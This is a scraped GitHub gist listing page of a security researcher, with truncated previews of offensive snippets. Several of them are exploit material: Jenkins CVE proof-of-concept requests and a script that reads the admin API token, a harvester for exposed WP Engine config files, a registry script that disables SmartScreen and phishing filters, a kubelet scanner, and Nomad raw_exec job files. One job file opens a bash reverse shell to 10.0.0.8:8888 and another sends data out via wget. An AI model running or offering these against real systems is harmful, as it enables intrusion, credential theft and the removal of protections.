Skip to content

Instantly share code, notes, and snippets.

Chris Gates carnal0wnage

Block or report user

Report or block carnal0wnage

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@carnal0wnage
carnal0wnage / gist:fad7c95492224e609ddc47fb08ac8438
Created Feb 28, 2019
Jenkins - SECURITY-180/CVE-2015-1814 PoC
View gist:fad7c95492224e609ddc47fb08ac8438
POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken HTTP/1.1
Host: 10.0.0.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://10.0.0.160:8080/asynchPeople/
@carnal0wnage
carnal0wnage / gist:1f316c01eaa7707c3cc6497ef04857a8
Last active Feb 28, 2019
Jenkins - SECURITY-200 / CVE-2015-5323 PoC
View gist:1f316c01eaa7707c3cc6497ef04857a8
//from: https://gist.github.com/hayderimran7/dec6a655ba671fa5b3c3
import jenkins.security.*
//j.jenkins.setSecurityRealm(j.createDummySecurityRealm());
User u = User.get("admin")
ApiTokenProperty t = u.getProperty(ApiTokenProperty.class)
def token = t.getApiToken()
//token.getClass()
println "token is $token "
View wpeprivate-config.sh
#!/bin/bash
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
TARGET=$1
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)
# Pretty Colors
RESET='\033[00m'
GREEN='\033[01;32m'
View gist:ff2b86ee166f504eaac362d5dece3529
REGEDIT4
; @ECHO OFF
; CLS
; REGEDIT.EXE /S "%~f0"
; EXIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Off"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter]
"EnabledV9"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AppHost]
@carnal0wnage
carnal0wnage / kubelet-find.sh
Created Jan 8, 2019
bash script to open file of IPs and looks for unsecure k8 API (10250)
View kubelet-find.sh
for a in $(cat kube-gke.txt); do
echo $a;
curl --insecure https://$a:10250/runningpods ";
echo "";
echo "";
done
@carnal0wnage
carnal0wnage / sploit_service_revshell.hcl
Created Dec 18, 2018
hcl file to get a reverse shell from the nomad server via raw_exec
View sploit_service_revshell.hcl
job "sploit_service_revshell" {
datacenters = ["dc1"]
group "sploit" {
task "shello" {
driver = "raw_exec"
config {
command = "/bin/bash"
args = ["-c", "bash -i >& /dev/tcp/10.0.0.8/8888 0>&1"]
}
@carnal0wnage
carnal0wnage / sploit_service.hcl
Created Dec 18, 2018
hcl file that exploits nomad raw_exec
View sploit_service.hcl
job "sploit_service" {
datacenters = ["dc1"]
group "sploit" {
task "shello" {
driver = "raw_exec"
config {
command = "/bin/bash"
args = ["-c", "wget http://10.0.0.8:8000/?foo=`which nc`"]
}
@carnal0wnage
carnal0wnage / client2.hcl
Created Dec 18, 2018
simple client config for nomad
View client2.hcl
# Increase log verbosity
log_level = "DEBUG"
# Setup data dir
data_dir = "/tmp/client2"
# Give the agent a unique name. Defaults to hostname
name = "client2"
# Enable the client
@carnal0wnage
carnal0wnage / client1.hcl
Created Dec 18, 2018
simple client config for nomad
View client1.hcl
# Increase log verbosity
log_level = "DEBUG"
# Setup data dir
data_dir = "/tmp/client1"
# Give the agent a unique name. Defaults to hostname
name = "client1"
# Enable the client
@carnal0wnage
carnal0wnage / server.hcl
Created Dec 18, 2018
simple nomad server.hcl file
View server.hcl
# Increase log verbosity
log_level = "DEBUG"
# Setup data dir
data_dir = "/tmp/server1"
# Enable the server
server {
enabled = true
You can’t perform that action at this time.